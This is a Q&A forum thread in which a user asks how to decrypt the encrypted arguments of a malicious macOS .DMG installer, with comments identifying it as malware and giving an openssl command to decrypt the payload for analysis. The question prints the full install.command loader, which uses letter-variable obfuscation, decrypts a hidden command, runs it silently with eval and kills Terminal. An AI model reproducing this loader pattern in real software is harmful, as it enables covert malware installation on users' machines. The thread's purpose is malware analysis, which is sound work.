Malware .DMG package - Encrypted Arguments

Question

I stumbled upon some kind of malicious .DMG package. I have seen people bringing this modus operandis, but I would like to know how to decrypt the arguments within the script code.

I have tried all imaginable possibilities with openssl and have just, presumably, had success finding the uncoded base64, but yet encrypted, string of args. Can someone help me finding a way to decrypt it?

Thank you in advance.

the .dmg contains 2 files:

File 1) install.command Content:

##!/bin/bash
G="a";F="c";Q="d";H="e";V="l";Z="m";X="n";T="o";J="p";K="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export                       commandArgs='U2FsdGVkX1/MUy+BnVes66qUAHeVLtB+EBV6jvLDEpgJ6RbBaZvgH3gq8EE75t4voue4ozCwYUC6/2B+g2oKKVah4UzxtR+BcCiO/tOqHyqgzIO1hsBwYKNJRYLm0YFnYB2nbJnUpaS6cPBIR8r9H5cFeHL1jaE9ZebSu0V2K1NJjpdoJ7tgbeS7LGpFrVDEzXjR92nwX7eJCQMGYhOIMx+DeN5yBXwpPD59BnypLtqORX2AVmecDHlAPOKBGuXKdiOEJss6I59D0NiHX5Mm1jVCtQq5Wim9SJk5lw2WC3GWzGYxHQRdvBTfzc7M7+Ki'
decryptedFommand="$(echo -e "$commandArgs" | ${T}${J}${H}${X}${K}${K}${V} ${H}${X}${F} -        ${G}${H}${K}-256-cbc -${Q} -A -b${G}${K}${H}64 -${J}${G}${K}${K} "${J}${G}${K}${K}:$archive")"
nohup /bin/bash -c "eval \"$decryptedFommand\"" >/dev/null 2>&1 &
killall Terminal #

A second file called Z0kKERs3XQ and it basically contains a massive what seems to be encrypted string

My question is: how can I decrypt the "commandArgs" variable, knowing Z0kKERs3XQ is the key/password or whatever?

Thank you in advance.

Almost certainly a malware installer, looks very similar to [this example](https://stackoverflow.com/questions/62005699/how-harmful-is-this-command/62012152#62012152) except for a different filename/decrypt key and different variable names. See the comments there for decrypt instructions (just replace the filename/key with yours). — Gordon Davisson, Jun 06 '20 at 19:18
Thank you for your support. I followed all the instructions, changing the actual pathnames and filenames and got a error alert: "bad decrypt 4624078272:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:crypto/evp/evp_enc.c:570". I noticed that a output file was successfully created, but dunnot know what that error message could possible mean to the integrity of the output file.... Any insights? Thank you again. — jaymzleutz, Jun 06 '20 at 21:46
I’d have to get copies of the files to get a better idea what’s going on. Where did you find this disk image? — Gordon Davisson, Jun 06 '20 at 22:13
I found this link. That's pretty much the same files inside the dmg package: https://macgamez-download.com/2018/04/neverwinter-nights-enhanced-edition-macosx-activated-torrent-uploaded-uptobox/ By the way- although I am pretty sure this is subject for a whole new thread- is there any way to convert the decrypted binary file to some "human" readable text, even if in low level language/source code? Thank you, for your patience man. — jaymzleutz, Jun 06 '20 at 22:48
Got the file; thanks. Try this command to decrypt it: `openssl enc -aes-256-cbc -d -A -base64 -k "Z0kKERs3XQ" -in "/Volumes/Install/.hidden/Z0kKERs3XQ" -out ~/Desktop/decrypted-malware-binary`. As for figuring out what the binary does: that's probably a few orders of magnitude harder than figuring out the shell script. Reverse-engineering isn't a separate question, it's a [whole different stackexchange site](https://reverseengineering.stackexchange.com). — Gordon Davisson, Jun 07 '20 at 03:03

Malware .DMG package - Encrypted Arguments

0 Answers0